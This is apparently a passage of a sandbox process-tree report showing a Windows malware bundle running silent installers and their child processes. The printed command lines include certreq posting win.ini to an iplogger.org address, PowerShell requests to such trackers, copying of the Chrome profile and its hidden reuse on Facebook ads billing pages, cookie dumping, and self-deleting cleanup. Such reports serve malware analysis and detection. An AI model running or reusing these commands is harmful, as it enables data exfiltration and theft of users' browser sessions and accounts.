C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:4720

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:6336

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:8420

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:10176

C:\Users\Admin\AppData\Local\Temp\soq3cwr1s5a\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\soq3cwr1s5a\chashepro3.exe" /VERYSILENT
8⤵
PID:7380

C:\Users\Admin\AppData\Local\Temp\is-Q0RTE.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q0RTE.tmp\chashepro3.tmp" /SL5="$402B0,2012497,58368,C:\Users\Admin\AppData\Local\Temp\soq3cwr1s5a\chashepro3.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
PID:4268

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
10⤵
PID:7704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
11⤵
PID:6592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
11⤵
PID:3320

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:3636

C:\Windows\SysWOW64\cmd.exe
cmd
12⤵
PID:6884

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
Fai.com Far.xlt
13⤵
PID:7488

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com Far.xlt
14⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
15⤵
PID:7792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 864
15⤵
- Program crash
PID:5040

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
13⤵
- Runs ping.exe
PID:7976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:7208

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
10⤵
- Checks computer location settings
PID:5156

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:6160

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
- Modifies registry class
PID:5292

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
- Suspicious use of SetThreadContext
PID:6728

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:2304

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
10⤵
PID:6876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:6236

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
- Checks computer location settings
PID:5608

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:4932

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:7460

C:\Users\Admin\AppData\Local\Temp\cvk4uazhnf1\vict.exe
"C:\Users\Admin\AppData\Local\Temp\cvk4uazhnf1\vict.exe" /VERYSILENT /id=535
8⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\is-4QJA8.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4QJA8.tmp\vict.tmp" /SL5="$501F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\cvk4uazhnf1\vict.exe" /VERYSILENT /id=535
9⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:6240

C:\Users\Admin\AppData\Local\Temp\is-VLSIE.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-VLSIE.tmp\wimapi.exe" 535
10⤵
PID:7788

C:\Users\Admin\AppData\Local\Temp\2j3t10zolii\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\2j3t10zolii\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:7312

C:\Users\Admin\AppData\Local\Temp\is-U7SSV.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U7SSV.tmp\Setup3310.tmp" /SL5="$80658,802346,56832,C:\Users\Admin\AppData\Local\Temp\2j3t10zolii\Setup3310.exe" /Verysilent /subid=577
9⤵
- Loads dropped DLL
PID:6116

C:\Users\Admin\AppData\Local\Temp\is-SK0CM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SK0CM.tmp\Setup.exe" /Verysilent
10⤵
PID:5628

C:\Users\Admin\AppData\Local\Temp\is-KDOJO.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KDOJO.tmp\Setup.tmp" /SL5="$1077E,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-SK0CM.tmp\Setup.exe" /Verysilent
11⤵
- Drops file in Windows directory
PID:8148

C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\ProPlugin.exe" /Verysilent
12⤵
PID:8328

C:\Users\Admin\AppData\Local\Temp\is-URUOM.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-URUOM.tmp\ProPlugin.tmp" /SL5="$107CA,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\ProPlugin.exe" /Verysilent
13⤵
PID:8496

C:\Users\Admin\AppData\Local\Temp\is-4O3A8.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4O3A8.tmp\Setup.exe"
14⤵
PID:8668

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
15⤵
PID:7308

C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\Delta.exe" /Verysilent
12⤵
PID:8236

C:\Users\Admin\AppData\Local\Temp\is-EH461.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EH461.tmp\Delta.tmp" /SL5="$506D6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\Delta.exe" /Verysilent
13⤵
PID:7180

C:\Users\Admin\AppData\Local\Temp\is-AE8L2.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-AE8L2.tmp\Setup.exe" /VERYSILENT
14⤵
- Checks processor information in registry
PID:4404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-AE8L2.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:8404

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:4436

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:8900

C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\zznote.exe" /Verysilent
12⤵
PID:6476

C:\Users\Admin\AppData\Local\Temp\is-215B7.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-215B7.tmp\zznote.tmp" /SL5="$606D6,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\zznote.exe" /Verysilent
13⤵
PID:5228

C:\Users\Admin\AppData\Local\Temp\is-QEPPD.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-QEPPD.tmp\jg4_4jaa.exe" /silent
14⤵
- Checks whether UAC is enabled
PID:2648

C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-PE153.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:7228

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
- Checks computer location settings
PID:1268

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:8808

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:9488

C:\Users\Admin\AppData\Local\Temp\q1agppbxqop\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\q1agppbxqop\askinstall24.exe"
8⤵
PID:5664

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:2060

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:7972

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
9⤵
- Enumerates system info in registry
PID:8432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
9⤵
PID:8748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,11550678264051348305,5730488727495773852,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1636 /prefetch:8
10⤵
PID:9016

C:\Users\Admin\AppData\Local\Temp\ouvkyldc0zr\vict.exe
"C:\Users\Admin\AppData\Local\Temp\ouvkyldc0zr\vict.exe" /VERYSILENT /id=535
8⤵
PID:4280

C:\Users\Admin\AppData\Local\Temp\is-UIIKI.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UIIKI.tmp\vict.tmp" /SL5="$2065A,870426,780800,C:\Users\Admin\AppData\Local\Temp\ouvkyldc0zr\vict.exe" /VERYSILENT /id=535
9⤵
- Loads dropped DLL
PID:6684

C:\Users\Admin\AppData\Local\Temp\is-1B6MF.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-1B6MF.tmp\wimapi.exe" 535
10⤵
PID:7496

C:\Users\Admin\AppData\Local\Temp\ani2r0mwbp4\yucokcvmiol.exe
"C:\Users\Admin\AppData\Local\Temp\ani2r0mwbp4\yucokcvmiol.exe" /ustwo INSTALL
8⤵
PID:3204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 652
9⤵
- Program crash
PID:8440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 668
9⤵
- Program crash
PID:8588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 768
9⤵
- Program crash
PID:8672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 816
9⤵
- Program crash
PID:8812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 876
9⤵
- Program crash
PID:9092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 720
9⤵
- Program crash
PID:6672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 1172
9⤵
- Program crash
PID:8700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 1184
9⤵
- Program crash
PID:3876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 1276
9⤵
- Program crash
PID:8520

C:\Users\Admin\AppData\Local\Temp\guy4pdbcbw1\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\guy4pdbcbw1\chashepro3.exe" /VERYSILENT
8⤵
PID:1516

C:\Users\Admin\AppData\Local\Temp\is-PGSC1.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PGSC1.tmp\chashepro3.tmp" /SL5="$2070E,2012497,58368,C:\Users\Admin\AppData\Local\Temp\guy4pdbcbw1\chashepro3.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
PID:7536

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
10⤵
PID:100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
11⤵
PID:4640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
11⤵
PID:8280

C:\Windows\SysWOW64\cmd.exe
cmd
12⤵
PID:8532

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
Fai.com Far.xlt
13⤵
- Suspicious use of SetThreadContext
PID:2456

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
14⤵
PID:8732

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
13⤵
- Runs ping.exe
PID:8388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4848

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
10⤵
- Checks computer location settings
PID:1360

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:5036

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:6492

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
- Suspicious use of SetThreadContext
PID:6652

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:8604

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
10⤵
PID:5084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:7240

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
- Checks computer location settings
PID:5300

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:5276

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:508

C:\Users\Admin\AppData\Local\Temp\pvajbmb4pzq\vict.exe
"C:\Users\Admin\AppData\Local\Temp\pvajbmb4pzq\vict.exe" /VERYSILENT /id=535
8⤵
PID:7164

C:\Users\Admin\AppData\Local\Temp\is-N9714.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N9714.tmp\vict.tmp" /SL5="$18080A,870426,780800,C:\Users\Admin\AppData\Local\Temp\pvajbmb4pzq\vict.exe" /VERYSILENT /id=535
9⤵
- Drops file in Program Files directory
PID:8864

C:\Users\Admin\AppData\Local\Temp\is-8NR86.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-8NR86.tmp\wimapi.exe" 535
10⤵
PID:9100

C:\Users\Admin\AppData\Local\Temp\1zpu3wjsvvi\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\1zpu3wjsvvi\askinstall24.exe"
8⤵
PID:9136

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:2284

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:7808

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
9⤵
- Enumerates system info in registry
PID:3156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
9⤵
PID:8652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffb56296e00,0x7ffb56296e10,0x7ffb56296e20
10⤵
PID:4356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1708 /prefetch:8
10⤵
PID:9224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2336 /prefetch:8
10⤵
PID:9276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
10⤵
PID:5952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
10⤵
PID:9356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
10⤵
PID:9348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
10⤵
PID:9492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:1
10⤵
PID:9524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
10⤵
PID:9476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
10⤵
PID:9468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4512 /prefetch:8
10⤵
PID:9656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5036 /prefetch:8
10⤵
PID:9944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5248 /prefetch:8
10⤵
PID:10224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5388 /prefetch:8
10⤵
PID:9404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1584 /prefetch:8
10⤵
PID:4048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5236 /prefetch:8
10⤵
PID:9712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1624 /prefetch:8
10⤵
PID:10208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1648,11185431133406761057,16085313770253330844,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2568 /prefetch:2
10⤵
PID:9416

C:\Users\Admin\AppData\Local\Temp\uofd0brigkw\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\uofd0brigkw\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:3096

C:\Users\Admin\AppData\Local\Temp\is-2KN4M.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2KN4M.tmp\Setup3310.tmp" /SL5="$306EA,802346,56832,C:\Users\Admin\AppData\Local\Temp\uofd0brigkw\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:9064

C:\Users\Admin\AppData\Local\Temp\is-8PC6A.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-8PC6A.tmp\Setup.exe" /Verysilent
10⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\is-K7SI3.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K7SI3.tmp\Setup.tmp" /SL5="$507BE,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-8PC6A.tmp\Setup.exe" /Verysilent
11⤵
- Drops file in Windows directory
PID:7908

C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\ProPlugin.exe" /Verysilent
12⤵
PID:8360

C:\Users\Admin\AppData\Local\Temp\is-LRF4P.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LRF4P.tmp\ProPlugin.tmp" /SL5="$10934,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\ProPlugin.exe" /Verysilent
13⤵
PID:8716

C:\Users\Admin\AppData\Local\Temp\is-HOJJP.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HOJJP.tmp\Setup.exe"
14⤵
PID:9672

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
15⤵
PID:9744

C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-DH08H.tmp\Delta.exe" /Verysilent
12⤵
PID:9684

